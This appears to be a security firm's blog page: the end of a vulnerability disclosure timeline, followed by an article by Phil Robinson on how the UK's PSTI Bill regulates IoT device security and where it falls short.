  • Vendor Confirmed Fix, and communicated to customers: July 7th 2022 
  • Prism Infosec Blog Post: July 19th 2022

The vulnerability was discovered, and this write-up authored, by Alexis Vanden Eijnde of Prism Infosec.

What is the PSTI and will it improve IoT security?

By Phil Robinson

The new Product Security and Telecommunications Infrastructure (PSTI) Bill currently going through parliament comprises two parts. The first aims to put in place safeguards to regulate the secure design of the Internet of Things (IoT) while the second will ensure broadband and 5G networks are gigabit-grade. It’s the first part that has caused a stir because it will, for the first time, see the introduction of enforceable regulation. 

Applicable to consumer products such as smartphones, connected cameras, TVs and speakers, fitness trackers, toys, white goods such as smart washing machines and fridges, and home equipment such as smoke detectors, door locks, home automation, and alarm systems, the regulations stipulate that manufacturers must:

  • Not use default passwords
  • Have a vulnerability disclosure policy
  • Be open about the length of time the product will be supported with security updates

Yet, while the move to regulate the IoT is regarded as long overdue, the PSTI has been criticised for not going far enough, particularly given the number of well-documented security vulnerabilities exhibited by smart technology.

Why is the IoT so insecure?

The root cause of the majority of issues that have plagued consumer hardware is that manufacturers are cost-driven and aim to be quick to market; in many cases this has led to shortcuts or a complete lack of information security considerations during the design process. The result is that common security weaknesses long since addressed in more mature software and hardware products, such as default usernames and passwords, straightforward password bypasses, weak hashing for password storage, and a lack of encryption for administrative traffic sent across open networks, remain widespread in the IoT.

In addition, the sector has suffered from other issues, such as a lack of security around firmware update processes (for example, a lack of signing) and hardware interface exposures that allow straightforward access to low-level functions of the device or its components (such as memory). And whereas it was hoped the sector would self-regulate, this doesn’t seem to have happened, with a report by the Internet of Things Security Foundation in 2020 finding that only 1 in 5 manufacturers had a disclosure process, meaning the majority could not be alerted to a security vulnerability.

Where does the PSTI fall short?

The bill currently addresses the most significant and easily exploitable weakness in IoT devices: the use of default passwords. However, many other common security weaknesses are not covered at this stage. That said, the use of default passwords is by far the most common way an IoT device will be compromised, and addressing it is a significant first step in improving the security of these products.

Focusing on default settings also makes it easy to establish whether a manufacturer is in breach of the bill, whereas compliance with other measures (such as a stringent code review process to identify access control bypasses or input validation weaknesses) would not be so straightforward to ascertain.

The bill also does not stipulate a minimum support period for security updates, so manufacturers can still release products without a commitment to supporting them, leaving this decision in the hands of consumers who may not necessarily understand the risks.

Understandably perhaps, it’s not being applied retroactively, so it won’t cover the army of devices already out there, and while manufacturers must have a disclosure channel, there is no compulsion or timeframe for them to notify their users of any reported vulnerability. Nor is there any focus on patch management: users often find patches difficult to apply, so some move towards over-the-air or automated patching would have been welcome.

As mentioned above, there are many other vulnerabilities that can be used to exploit IoT devices, including disrupting administrative traffic, identifying and exploiting flaws in web or file transfer services running on the device, causing denial of service, interfering with the update process and deploying rogue firmware or exploiting the devices with physical access. 

So is the PSTI too little too late?

The PSTI is still winding its way through parliament and is unlikely to pass into law until 2023, but when it does, it will mark an important first step in the regulation of an industry that has previously been seen as playing fast and loose. It will force IoT product vendors around the world to consider the security of their consumer devices, provide a baseline of protection for devices sold to the public in the UK, and, for the first time, see offending vendors held to account if they do not abide by the articles of the law.

It’s important to remember that while the bill doesn’t cover as many security issues as one might have hoped, it does cover the vulnerability with the highest likelihood and impact of exploitation. Other key requirements, such as having a vulnerability disclosure policy and providing transparent advice on how long security updates will be released, are also welcome measures and support the improvement of product security over time.

Knowing how long a product will be supported will help consumers make an informed decision and is likely to be used by consumer support organisations such as Which? to differentiate offerings. In many ways, it sets a bar by which vendors can be measured and could lead to the emergence of consumer kitemarks, so that security becomes not a sunk cost but a differentiating factor that manufacturers can use to boost sales.

IoT devices do, of course, also impact the corporate environment, either because users seek to connect them to the network or because they act as potential conduits for an attack, such as ransomware or the large-scale DDoS attacks carried out by the Mirai botnet, which enslaved thousands of IoT devices. Consequently, the PSTI will affect businesses too and, depending on how the regulation evolves, it could even have a direct impact on security team workloads, particularly if it seeks to address patch management in the future.